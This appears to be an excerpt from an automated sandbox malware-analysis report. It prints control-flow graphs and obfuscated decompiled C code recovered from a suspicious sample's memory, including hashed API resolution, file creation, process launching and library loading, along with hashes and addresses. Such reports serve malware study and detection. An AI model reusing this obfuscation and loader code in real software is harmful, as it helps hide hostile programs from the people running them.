                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2314443678.00000000003E1000.00000020.00000001.sdmp, Offset: 003E0000, based on PE: true
                                                                                • Associated: 0000000F.00000002.2314437691.00000000003E0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000F.00000002.2314450855.00000000003ED000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000F.00000002.2314456602.00000000003EF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_3e0000_apds.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileOperation
                                                                                • String ID: X~$X~$X~
                                                                                • API String ID: 3080627654-3258893172
                                                                                • Opcode ID: 5c0d4332eba426a45873ba29692ea69c48a9a45b30bd37d7c3f2c4c624f98f58
                                                                                • Instruction ID: e2571259b13c115823b046172ad6e5d5bd7baf0cc5d258226f0d2eed19634773
                                                                                • Opcode Fuzzy Hash: 5c0d4332eba426a45873ba29692ea69c48a9a45b30bd37d7c3f2c4c624f98f58
                                                                                • Instruction Fuzzy Hash: 6A31B0716002E58BD726AB7ADC4976B37EAABC4704F000B2CB515CF2C1EA34DA058B91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003E80A0, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 219fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 343 3e80a0-3e815b 344 3e8163-3e8168 343->344 345 3e8170-3e8175 344->345 346 3e817b 345->346 347 3e8338-3e833d 345->347 348 3e8287-3e829b call 3e34c0 346->348 349 3e8181-3e8186 346->349 350 3e836f-3e8377 347->350 351 3e833f-3e8344 347->351 372 3e829d-3e82b5 call 3e3f00 call 3e3e60 348->372 373 3e82bb-3e82e3 348->373 357 3e818c-3e8191 349->357 358 3e8252-3e8259 349->358 355 3e8379-3e8391 call 3e3f00 call 3e3e60 350->355 356 3e8397-3e83bb CreateFileW 350->356 352 3e8346-3e834b 351->352 353 3e8365-3e836a 351->353 359 3e834d-3e8352 352->359 360 3e83c7-3e83ce 352->360 353->345 355->356 363 3e83ee-3e83fa 356->363 364 3e83bd-3e83c2 356->364 367 3e81e3-3e821a 357->367 368 3e8193-3e8198 357->368 365 3e825b-3e8271 call 3e3f00 call 3e3e60 358->365 366 3e8276-3e8282 358->366 359->345 369 3e8358-3e8364 359->369 376 3e83eb-3e83ec CloseHandle 360->376 377 3e83d0-3e83e6 call 3e3f00 call 3e3e60 360->377 364->345 365->366 366->345 370 3e821c-3e8232 call 3e3f00 call 3e3e60 367->370 371 3e8237-3e824d 367->371 368->359 378 3e819e-3e81e1 call 3eb6e0 368->378 370->371 371->345 372->373 397 3e82e5-3e82fb call 3e3f00 call 3e3e60 373->397 398 3e8300-3e830b 373->398 376->363 377->376 378->345 397->398 407 3e830d-3e8323 call 3e3f00 call 3e3e60 398->407 408 3e8328-3e8333 398->408 407->408 408->344
                                                                                C-Code - Quality: 71%
                                                                                			E003E80A0(signed int __edx) {
				short _v524;
				struct _SECURITY_ATTRIBUTES* _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				char _v564;
				intOrPtr _v568;
				char _v572;
				struct _SECURITY_ATTRIBUTES* _v576;
				intOrPtr _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				void* __ebx;
				void* __ebp;
				void* _t58;
				void* _t64;
				void* _t66;
				void* _t73;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t82;
				void* _t83;
				intOrPtr* _t86;
				void* _t88;
				intOrPtr _t89;
				intOrPtr* _t90;
				void* _t92;
				void* _t96;
				intOrPtr _t101;
				char _t105;
				signed int _t122;
				void* _t125;
				void* _t127;
				void* _t128;
				signed int* _t129;
				void* _t131;

				_t122 = __edx;
				_t129 =  &_v596;
				_v584 = 0x9318;
				_t58 = 0x343bfd89;
				_v584 = _v584 ^ 0xde90c338;
				_v584 = _v584 ^ 0xde905120;
				_v596 = 0x7d19;
				_v596 = _v596 << 9;
				_v596 = _v596 >> 0xe;
				_v596 = _v596 + 0xffff07e5;
				_v596 = _v596 | 0x8aea6eef;
				_v596 = _v596 + 0xd867;
				_v596 = _v596 + 0x9c41;
				_v596 = _v596 + 0x3de0;
				_v596 = _v596 + 0x218b;
				_v596 = _v596 ^ 0x00014403;
				_v592 = 0x2591;
				_t128 = _v584;
				_t96 = 0;
				_v592 = _v592 * 0x7d;
				_v592 = _v592 + 0x8d68;
				_v592 = _v592 + 0xffff8911;
				_v592 = _v592 * 0x6a;
				_v592 = _v592 + 0xffff93d5;
				_v592 = _v592 ^ 0x07a13cd2;
				_v588 = 0x789;
				_v588 = _v588 >> 1;
				_v588 = _v588 ^ 0xaee58af2;
				_v588 = _v588 ^ 0xaee58936;
				while(1) {
					L1:
					goto L2;
					do {
						while(1) {
							L2:
							_t131 = _t58 - 0xea5411f;
							if(_t131 > 0) {
								break;
							}
							if(_t131 == 0) {
								_t73 = E003E34C0(0x3ed970);
								_t122 =  *0x3ee158;
								_t127 = _t73;
								if(_t122 == 0) {
									_t122 = E003E3E60(_t96, E003E3F00(0xc6fbcd74), 0xba71dd03, _t128);
									 *0x3ee158 = _t122;
								}
								_t101 =  *0x3ee54c; // 0x61e730
								_t50 = _t101 + 0x260; // 0x61e990
								_t51 = _t101 + 0x18; // 0x61e748
								 *_t122( &_v524, 0x104, _t127, _t51, _t50);
								_t78 =  *0x3ee494;
								_t129 =  &(_t129[5]);
								if(_t78 == 0) {
									_t83 = E003E3F00(0x9bab0b12);
									_t122 = 0x7facde30;
									_t78 = E003E3E60(_t96, _t83, 0x7facde30, _t128);
									 *0x3ee494 = _t78;
								}
								_t125 =  *_t78();
								_t80 =  *0x3edf30;
								if(_t80 == 0) {
									_t82 = E003E3F00(0x9bab0b12);
									_t122 = 0x5010a54d;
									_t80 = E003E3E60(_t96, _t82, 0x5010a54d, _t128);
									 *0x3edf30 = _t80;
								}
								 *_t80(_t125, 0, _t127);
								_t58 = 0x2c2d24c8;
								goto L1;
							} else {
								if(_t58 == 0x2f64d8b) {
									_t86 =  *0x3ee1d4;
									if(_t86 == 0) {
										_t88 = E003E3F00(0x9bab0b12);
										_t122 = 0xa229df38;
										_t86 = E003E3E60(_t96, _t88, 0xa229df38, _t128);
										 *0x3ee1d4 = _t86;
									}
									 *_t86( &_v572);
									_t58 = 0xc5e088d;
									continue;
								} else {
									if(_t58 == 0x6f65414) {
										_t89 = _v568;
										_t105 = _v572;
										_v560 = _t89;
										_v552 = _t89;
										_v544 = _t89;
										_v536 = _t89;
										_t90 =  *0x3edee4;
										_v564 = _t105;
										_v556 = _t105;
										_v548 = _t105;
										_v540 = _t105;
										_v532 = 0;
										if(_t90 == 0) {
											_t92 = E003E3F00(0x9bab0b12);
											_t122 = 0x4bf45878;
											_t90 = E003E3E60(_t96, _t92, 0x4bf45878, _t128);
											 *0x3edee4 = _t90;
										}
										 *_t90(_t128, 0,  &_v564, 0x28);
										_t58 = 0x3557bd8c;
										_t96 =  !=  ? 1 : _t96;
										continue;
									} else {
										if(_t58 != 0xc5e088d) {
											goto L24;
										} else {
											_v580 = 0xa8c00;
											_v576 = 0;
											_v596 = E003EB6E0(_v580, _v576, 0x989680, 0);
											_v592 = _t122;
											_v588 = _v588 - _v596;
											_t58 = 0xea5411f;
											asm("sbb [esp+0x2c], ecx");
											continue;
										}
									}
								}
							}
							L35:
						}
						if(_t58 == 0x2c2d24c8) {
							if( *0x3ede04 == 0) {
								_t66 = E003E3F00(0x9bab0b12);
								_t122 = 0xb66d748a;
								 *0x3ede04 = E003E3E60(_t96, _t66, 0xb66d748a, _t128);
							}
							_t64 = CreateFileW( &_v524, _v584, _v596, 0, _v592, _v588, 0); // executed
							_t128 = _t64;
							if(_t128 == 0xffffffff) {
								goto L34;
							} else {
								_t58 = 0x6f65414;
								goto L2;
							}
						} else {
							if(_t58 == 0x343bfd89) {
								_t58 = 0x2f64d8b;
								goto L2;
							} else {
								if(_t58 == 0x3557bd8c) {
									if( *0x3ede3c == 0) {
										 *0x3ede3c = E003E3E60(_t96, E003E3F00(0x9bab0b12), 0x20de7595, _t128);
									}
									CloseHandle(_t128); // executed
									L34:
									return _t96;
								} else {
									goto L24;
								}
							}
						}
						goto L35;
						L24:
					} while (_t58 != 0xcfe8e);
					return _t96;
					goto L35;
				}
			}













































                                                                                0x003e80a0
                                                                                0x003e80a0
                                                                                0x003e80a6
                                                                                0x003e80ae
                                                                                0x003e80b3
                                                                                0x003e80bb
                                                                                0x003e80c3
                                                                                0x003e80ca
                                                                                0x003e80ce
                                                                                0x003e80d2
                                                                                0x003e80d9
                                                                                0x003e80e0
                                                                                0x003e80e7
                                                                                0x003e80ee
                                                                                0x003e80f5
                                                                                0x003e80fc
                                                                                0x003e8103
                                                                                0x003e8112
                                                                                0x003e8116
                                                                                0x003e8119
                                                                                0x003e811d
                                                                                0x003e8125
                                                                                0x003e8133
                                                                                0x003e8137
                                                                                0x003e813f
                                                                                0x003e8147
                                                                                0x003e814f
                                                                                0x003e8153
                                                                                0x003e815b
                                                                                0x003e8163
                                                                                0x003e8163
                                                                                0x003e8168
                                                                                0x003e8170
                                                                                0x003e8170
                                                                                0x003e8170
                                                                                0x003e8170
                                                                                0x003e8175
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x003e817b
                                                                                0x003e828c
                                                                                0x003e8291
                                                                                0x003e8297
                                                                                0x003e829b
                                                                                0x003e82b3
                                                                                0x003e82b5
                                                                                0x003e82b5
                                                                                0x003e82bb
                                                                                0x003e82c1
                                                                                0x003e82c8
                                                                                0x003e82d7
                                                                                0x003e82d9
                                                                                0x003e82de
                                                                                0x003e82e3
                                                                                0x003e82ea
                                                                                0x003e82ef
                                                                                0x003e82f6
                                                                                0x003e82fb
                                                                                0x003e82fb
                                                                                0x003e8302
                                                                                0x003e8304
                                                                                0x003e830b
                                                                                0x003e8312
                                                                                0x003e8317
                                                                                0x003e831e
                                                                                0x003e8323
                                                                                0x003e8323
                                                                                0x003e832c
                                                                                0x003e832e
                                                                                0x00000000
                                                                                0x003e8181
                                                                                0x003e8186
                                                                                0x003e8252
                                                                                0x003e8259
                                                                                0x003e8260
                                                                                0x003e8265
                                                                                0x003e826c
                                                                                0x003e8271
                                                                                0x003e8271
                                                                                0x003e827b
                                                                                0x003e827d
                                                                                0x00000000
                                                                                0x003e818c
                                                                                0x003e8191
                                                                                0x003e81e3
                                                                                0x003e81e7
                                                                                0x003e81eb
                                                                                0x003e81ef
                                                                                0x003e81f3
                                                                                0x003e81f7
                                                                                0x003e81fb
                                                                                0x003e8200
                                                                                0x003e8204
                                                                                0x003e8208
                                                                                0x003e820c
                                                                                0x003e8210
                                                                                0x003e821a
                                                                                0x003e8221
                                                                                0x003e8226
                                                                                0x003e822d
                                                                                0x003e8232
                                                                                0x003e8232
                                                                                0x003e8241
                                                                                0x003e8245
                                                                                0x003e824a
                                                                                0x00000000
                                                                                0x003e8193
                                                                                0x003e8198
                                                                                0x00000000
                                                                                0x003e819e
                                                                                0x003e81a0
                                                                                0x003e81a8
                                                                                0x003e81c4
                                                                                0x003e81c8
                                                                                0x003e81d4
                                                                                0x003e81d8
                                                                                0x003e81dd
                                                                                0x00000000
                                                                                0x003e81dd
                                                                                0x003e8198
                                                                                0x003e8191
                                                                                0x003e8186
                                                                                0x00000000
                                                                                0x003e817b
                                                                                0x003e833d
                                                                                0x003e8377
                                                                                0x003e837e
                                                                                0x003e8383
                                                                                0x003e8391
                                                                                0x003e8391
                                                                                0x003e83b4
                                                                                0x003e83b6
                                                                                0x003e83bb
                                                                                0x00000000
                                                                                0x003e83bd
                                                                                0x003e83bd
                                                                                0x00000000
                                                                                0x003e83bd
                                                                                0x003e833f
                                                                                0x003e8344
                                                                                0x003e8365
                                                                                0x00000000
                                                                                0x003e8346
                                                                                0x003e834b
                                                                                0x003e83ce
                                                                                0x003e83e6
                                                                                0x003e83e6
                                                                                0x003e83ec
                                                                                0x003e83f1
                                                                                0x003e83fa
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x003e834b
                                                                                0x003e8344
                                                                                0x00000000
                                                                                0x003e834d
                                                                                0x003e834d
                                                                                0x003e8364
                                                                                0x00000000
                                                                                0x003e8364

                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,?,3251FEFE,?,?), ref: 003E83B4
                                                                                • CloseHandle.KERNELBASE(?,?,3251FEFE,?,?), ref: 003E83EC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2314443678.00000000003E1000.00000020.00000001.sdmp, Offset: 003E0000, based on PE: true
                                                                                • Associated: 0000000F.00000002.2314437691.00000000003E0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000F.00000002.2314450855.00000000003ED000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000F.00000002.2314456602.00000000003EF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_3e0000_apds.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseCreateFileHandle
                                                                                • String ID: 0a
                                                                                • API String ID: 3498533004-1287857891
                                                                                • Opcode ID: f5b9706bea5c369cdbea5793f4fac8c6caaca2901d062248e970327f764eb35c
                                                                                • Instruction ID: 9e072d228de8814512ae206b39ee61960d0d811ecf347f0b3db9b858980e14a7
                                                                                • Opcode Fuzzy Hash: f5b9706bea5c369cdbea5793f4fac8c6caaca2901d062248e970327f764eb35c
                                                                                • Instruction Fuzzy Hash: 1881C070A083958FD71ADF6AC88462BB7E9ABD4744F000A2DF589CB3D0EB74DD018B52
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003E4B70, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87processCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 415 3e4b70-3e4b80 416 3e4b9d-3e4bba 415->416 417 3e4b82-3e4b98 call 3e3f00 call 3e3e60 415->417 422 3e4bbc-3e4bd2 call 3e3f00 call 3e3e60 416->422 423 3e4bd7-3e4bf5 CreateProcessW 416->423 417->416 422->423 424 3e4bf7-3e4bfd 423->424 425 3e4c73-3e4c7a 423->425 428 3e4bff-3e4c13 424->428 429 3e4c14-3e4c1b 424->429 431 3e4c1d-3e4c33 call 3e3f00 call 3e3e60 429->431 432 3e4c38-3e4c45 429->432 431->432 439 3e4c47-3e4c5d call 3e3f00 call 3e3e60 432->439 440 3e4c62-3e4c72 432->440 439->440
                                                                                C-Code - Quality: 60%
                                                                                			E003E4B70(void* __ebx, WCHAR* __ecx, WCHAR* __edx, void* __ebp, int _a4, intOrPtr _a12) {
				struct _STARTUPINFOW _v72;
				struct _PROCESS_INFORMATION _v88;
				intOrPtr* _t9;
				int _t12;
				intOrPtr* _t15;
				intOrPtr* _t17;
				WCHAR* _t44;
				WCHAR* _t45;

				_t46 = __ebp;
				_t26 = __ebx;
				_t9 =  *0x3eddc0;
				_t45 = __edx;
				_t44 = __ecx;
				if(_t9 == 0) {
					_t9 = E003E3E60(__ebx, E003E3F00(0xc6fbcd74), 0x7e0ae558, __ebp);
					 *0x3eddc0 = _t9;
				}
				 *_t9( &_v72, 0, 0x44);
				_v72.cb = 0x44;
				if( *0x3ee21c == 0) {
					 *0x3ee21c = E003E3E60(_t26, E003E3F00(0x9bab0b12), 0xbd6cc871, _t46);
				}
				_t12 = CreateProcessW(_t44, _t45, 0, 0, _a4, 0, 0, 0,  &_v72,  &_v88); // executed
				if(_t12 == 0) {
					return 0;
				} else {
					if(_a12 == 0) {
						_t15 =  *0x3ede3c;
						if(_t15 == 0) {
							_t15 = E003E3E60(_t26, E003E3F00(0x9bab0b12), 0x20de7595, _t46);
							 *0x3ede3c = _t15;
						}
						 *_t15(_v88.hProcess);
						_t17 =  *0x3ede3c;
						if(_t17 == 0) {
							_t17 = E003E3E60(_t26, E003E3F00(0x9bab0b12), 0x20de7595, _t46);
							 *0x3ede3c = _t17;
						}
						 *_t17(_v88.hProcess);
						return 1;
					} else {
						asm("movdqu xmm0, [esp+0x8]");
						asm("movdqu [eax], xmm0");
						return 1;
					}
				}
			}











                                                                                0x003e4b70
                                                                                0x003e4b70
                                                                                0x003e4b70
                                                                                0x003e4b79
                                                                                0x003e4b7c
                                                                                0x003e4b80
                                                                                0x003e4b93
                                                                                0x003e4b98
                                                                                0x003e4b98
                                                                                0x003e4ba6
                                                                                0x003e4bb0
                                                                                0x003e4bba
                                                                                0x003e4bd2
                                                                                0x003e4bd2
                                                                                0x003e4bf1
                                                                                0x003e4bf5
                                                                                0x003e4c7a
                                                                                0x003e4bf7
                                                                                0x003e4bfd
                                                                                0x003e4c14
                                                                                0x003e4c1b
                                                                                0x003e4c2e
                                                                                0x003e4c33
                                                                                0x003e4c33
                                                                                0x003e4c3c
                                                                                0x003e4c3e
                                                                                0x003e4c45
                                                                                0x003e4c58
                                                                                0x003e4c5d
                                                                                0x003e4c5d
                                                                                0x003e4c66
                                                                                0x003e4c72
                                                                                0x003e4bff
                                                                                0x003e4bff
                                                                                0x003e4c05
                                                                                0x003e4c13
                                                                                0x003e4c13
                                                                                0x003e4bfd

                                                                                APIs
                                                                                • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 003E4BF1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2314443678.00000000003E1000.00000020.00000001.sdmp, Offset: 003E0000, based on PE: true
                                                                                • Associated: 0000000F.00000002.2314437691.00000000003E0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000F.00000002.2314450855.00000000003ED000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000F.00000002.2314456602.00000000003EF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_3e0000_apds.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateProcess
                                                                                • String ID: D$X~
                                                                                • API String ID: 963392458-2090554203
                                                                                • Opcode ID: c9d5998e97066cf648ffc47c7c72f2f9770aae2be44ba8eb43210b7d21c66f83
                                                                                • Instruction ID: ca1ee35ab55143b4282b9bd607de2bd9cfaaff2e96d1eec5feb6406f363d1a85
                                                                                • Opcode Fuzzy Hash: c9d5998e97066cf648ffc47c7c72f2f9770aae2be44ba8eb43210b7d21c66f83
                                                                                • Instruction Fuzzy Hash: B121D6317003A55BD726AB7BCC857BB37AAABD4700F10462CB554CF2D0FA70D9058751
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003E30A0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 165memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 529 3e30a0-3e30b6 530 3e30ba-3e30bf 529->530 531 3e30c0-3e30c5 530->531 532 3e30cb 531->532 533 3e3201-3e3206 531->533 534 3e31ed-3e31f1 532->534 535 3e30d1-3e30d6 532->535 536 3e3208-3e320d 533->536 537 3e3245-3e324c 533->537 540 3e32f6-3e3300 534->540 541 3e31f7-3e31fc 534->541 542 3e30dc-3e30e1 535->542 543 3e31da-3e31e8 535->543 544 3e32ab-3e32b3 536->544 545 3e3213-3e3218 536->545 538 3e324e-3e3264 call 3e3f00 call 3e3e60 537->538 539 3e3269-3e3274 537->539 538->539 564 3e3276-3e328c call 3e3f00 call 3e3e60 539->564 565 3e3291-3e329f RtlAllocateHeap 539->565 541->531 549 3e30e7-3e30ec 542->549 550 3e31a0-3e31a8 542->550 543->531 546 3e32b5-3e32cd call 3e3f00 call 3e3e60 544->546 547 3e32d3-3e32f3 544->547 551 3e322d-3e3232 545->551 552 3e321a-3e3228 call 3e3d00 545->552 546->547 547->540 549->551 556 3e30f2-3e319b 549->556 558 3e31aa-3e31c2 call 3e3f00 call 3e3e60 550->558 559 3e31c8-3e31d5 550->559 551->531 560 3e3238-3e3242 551->560 552->530 556->530 558->559 559->530 564->565 565->540 572 3e32a1-3e32a6 565->572 572->530
                                                                                C-Code - Quality: 71%
                                                                                			E003E30A0() {
				void* __ebx;
				void* __ecx;
				void* __ebp;
				void* _t61;
				intOrPtr* _t62;
				void* _t65;
				intOrPtr _t93;
				intOrPtr* _t95;
				intOrPtr _t107;
				intOrPtr* _t116;
				void* _t127;
				void* _t128;
				intOrPtr _t129;
				signed int _t134;
				void* _t135;
				void* _t136;

				_t93 =  *((intOrPtr*)(_t135 + 0xc));
				_t61 = 0x11f367c2;
				_t134 =  *(_t135 + 0x10);
				_t129 =  *((intOrPtr*)(_t135 + 0x14));
				_t127 =  *(_t135 + 0x18);
				while(1) {
					L1:
					do {
						while(1) {
							L2:
							_t136 = _t61 - 0x12466c01;
							if(_t136 > 0) {
								break;
							}
							if(_t136 == 0) {
								if(_t93 !=  *(_t135 + 0x18)) {
									L29:
									return 1;
								} else {
									_t61 = 0x2f21cdd2;
									continue;
								}
							} else {
								if(_t61 == 0x7a26146) {
									_t61 =  ==  ? 0x2f21cdd2 : 0x12466c01;
									continue;
								} else {
									if(_t61 == 0x8928514) {
										_t95 =  *0x3ee1cc;
										if(_t95 == 0) {
											_t95 = E003E3E60(_t93, E003E3F00(0x55ab7d30), 0x815a9da3, _t134);
											 *0x3ee1cc = _t95;
										}
										_t129 =  *_t95(_t134 + 0x2c);
										_t61 = 0x39d78901;
										while(1) {
											L1:
											goto L2;
										}
									} else {
										if(_t61 != 0x11f367c2) {
											goto L18;
										} else {
											 *(_t135 + 0x18) = 0x2e7c;
											 *(_t135 + 0x18) = 0x3e0f83e1 *  *(_t135 + 0x18) >> 0x20 >> 4;
											 *(_t135 + 0x18) =  *(_t135 + 0x18) >> 7;
											 *(_t135 + 0x18) = 0x2f149903 *  *(_t135 + 0x18) >> 0x20 >> 4;
											 *(_t135 + 0x18) =  *(_t135 + 0x18) + 0xffff1475;
											 *(_t135 + 0x18) =  *(_t135 + 0x18) * 0x15;
											 *(_t135 + 0x18) =  *(_t135 + 0x18) >> 2;
											 *(_t135 + 0x18) = 0x22b63cbf *  *(_t135 + 0x18) >> 0x20 >> 4;
											 *(_t135 + 0x18) =  *(_t135 + 0x18) ^ 0x8ee7705c;
											 *(_t135 + 0x10) = 0xa461;
											 *(_t135 + 0x10) =  *(_t135 + 0x10) << 0xe;
											 *(_t135 + 0x10) =  *(_t135 + 0x10) * 8 -  *(_t135 + 0x10) << 2;
											_t61 = 0x8928514;
											 *(_t135 + 0x10) = 0x51eb851f *  *(_t135 + 0x10) >> 0x20 >> 3;
											 *(_t135 + 0x10) =  *(_t135 + 0x10) + 0xffffb6ab;
											 *(_t135 + 0x10) =  *(_t135 + 0x10) ^ 0x88f30986;
											while(1) {
												L1:
												goto L2;
											}
										}
									}
								}
							}
							L30:
						}
						if(_t61 == 0x2f21cdd2) {
							_t62 =  *0x3ee494;
							if(_t62 == 0) {
								_t62 = E003E3E60(_t93, E003E3F00(0x9bab0b12), 0x7facde30, _t134);
								 *0x3ee494 = _t62;
							}
							_t128 =  *_t62();
							if( *0x3edd18 == 0) {
								 *0x3edd18 = E003E3E60(_t93, E003E3F00(0x9bab0b12), 0x9ff0609c, _t134);
							}
							_t65 = RtlAllocateHeap(_t128, 8, 0x24c); // executed
							_t127 = _t65;
							if(_t127 == 0) {
								goto L29;
							} else {
								_t61 = 0x35eaa088;
								goto L1;
							}
						} else {
							if(_t61 == 0x35eaa088) {
								_t116 =  *0x3ee43c;
								if(_t116 == 0) {
									_t116 = E003E3E60(_t93, E003E3F00(0x9bab0b12), 0x2df4d385, _t134);
									 *0x3ee43c = _t116;
								}
								 *_t116(_t127 + 0x3c, _t134 + 0x2c, (_t129 - _t134 - 0x2c >> 1) + 1);
								_t107 =  *((intOrPtr*)(_t135 + 0x1c));
								 *(_t127 + 0x2c) =  *(_t107 + 0x1c);
								 *((intOrPtr*)(_t107 + 0xc)) =  *((intOrPtr*)(_t107 + 0xc)) + 1;
								 *(_t107 + 0x1c) = _t127;
								goto L29;
							} else {
								if(_t61 != 0x39d78901) {
									goto L18;
								} else {
									_t93 = E003E3D00(_t129);
									_t61 = 0x7a26146;
									while(1) {
										L1:
										goto L2;
									}
								}
							}
						}
						goto L30;
						L18:
					} while (_t61 != 0x100ad7b4);
					return 1;
					goto L30;
				}
			}



















                                                                                0x003e30a2
                                                                                0x003e30a6
                                                                                0x003e30ac
                                                                                0x003e30b1
                                                                                0x003e30b6
                                                                                0x003e30ba
                                                                                0x003e30ba
                                                                                0x003e30c0
                                                                                0x003e30c0
                                                                                0x003e30c0
                                                                                0x003e30c0
                                                                                0x003e30c5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x003e30cb
                                                                                0x003e31f1
                                                                                0x003e32f9
                                                                                0x003e3300
                                                                                0x003e31f7
                                                                                0x003e31f7
                                                                                0x00000000
                                                                                0x003e31f7
                                                                                0x003e30d1
                                                                                0x003e30d6
                                                                                0x003e31e5
                                                                                0x00000000
                                                                                0x003e30dc
                                                                                0x003e30e1
                                                                                0x003e31a0
                                                                                0x003e31a8
                                                                                0x003e31c0
                                                                                0x003e31c2
                                                                                0x003e31c2
                                                                                0x003e31ce
                                                                                0x003e31d0
                                                                                0x003e30ba
                                                                                0x003e30ba
                                                                                0x00000000
                                                                                0x003e30ba
                                                                                0x003e30e7
                                                                                0x003e30ec
                                                                                0x00000000
                                                                                0x003e30f2
                                                                                0x003e30f2
                                                                                0x003e310d
                                                                                0x003e3111
                                                                                0x003e311f
                                                                                0x003e3123
                                                                                0x003e3130
                                                                                0x003e3139
                                                                                0x003e3147
                                                                                0x003e314b
                                                                                0x003e3153
                                                                                0x003e315b
                                                                                0x003e3175
                                                                                0x003e317f
                                                                                0x003e3187
                                                                                0x003e318b
                                                                                0x003e3193
                                                                                0x003e30ba
                                                                                0x003e30ba
                                                                                0x00000000
                                                                                0x003e30ba
                                                                                0x003e30ba
                                                                                0x003e30ec
                                                                                0x003e30e1
                                                                                0x003e30d6
                                                                                0x00000000
                                                                                0x003e30cb
                                                                                0x003e3206
                                                                                0x003e3245
                                                                                0x003e324c
                                                                                0x003e325f
                                                                                0x003e3264
                                                                                0x003e3264
                                                                                0x003e326b
                                                                                0x003e3274
                                                                                0x003e328c
                                                                                0x003e328c
                                                                                0x003e3299
                                                                                0x003e329b
                                                                                0x003e329f
                                                                                0x00000000
                                                                                0x003e32a1
                                                                                0x003e32a1
                                                                                0x00000000
                                                                                0x003e32a1
                                                                                0x003e3208
                                                                                0x003e320d
                                                                                0x003e32ab
                                                                                0x003e32b3
                                                                                0x003e32cb
                                                                                0x003e32cd
                                                                                0x003e32cd
                                                                                0x003e32e4
                                                                                0x003e32e6
                                                                                0x003e32ed
                                                                                0x003e32f0
                                                                                0x003e32f3
                                                                                0x00000000
                                                                                0x003e3213
                                                                                0x003e3218
                                                                                0x00000000
                                                                                0x003e321a
                                                                                0x003e3221
                                                                                0x003e3223
                                                                                0x003e30ba
                                                                                0x003e30ba
                                                                                0x00000000
                                                                                0x003e30ba
                                                                                0x003e30ba
                                                                                0x003e3218
                                                                                0x003e320d
                                                                                0x00000000
                                                                                0x003e322d
                                                                                0x003e322d
                                                                                0x003e3242
                                                                                0x00000000
                                                                                0x003e3242

                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(00000000,00000008,0000024C), ref: 003E3299
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2314443678.00000000003E1000.00000020.00000001.sdmp, Offset: 003E0000, based on PE: true
                                                                                • Associated: 0000000F.00000002.2314437691.00000000003E0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000F.00000002.2314450855.00000000003ED000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000F.00000002.2314456602.00000000003EF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_3e0000_apds.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID: |.
                                                                                • API String ID: 1279760036-512043466
                                                                                • Opcode ID: 8ab4ef9328b250616d71b18c254f70d120545319738c7ee24307e0a2aa8e2096
                                                                                • Instruction ID: 9241e975706e61e07d63f286ef6c32bda042b43280528217a9b98689843478f0
                                                                                • Opcode Fuzzy Hash: 8ab4ef9328b250616d71b18c254f70d120545319738c7ee24307e0a2aa8e2096
                                                                                • Instruction Fuzzy Hash: BA51D3717083A58BC719DF6EC48852A7BEAEBD4304F204A1EF451CB391DB31DE498B92
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003E7080, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45libraryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 580 3e7080-3e7092 call 3e34c0 583 3e70af-3e70c3 LoadLibraryW 580->583 584 3e7094-3e70aa call 3e3f00 call 3e3e60 580->584 586 3e70c5-3e70db call 3e3f00 call 3e3e60 583->586 587 3e70e0-3e70eb 583->587 584->583 586->587 594 3e70ed-3e7103 call 3e3f00 call 3e3e60 587->594 595 3e7108-3e7110 587->595 594->595
                                                                                C-Code - Quality: 75%
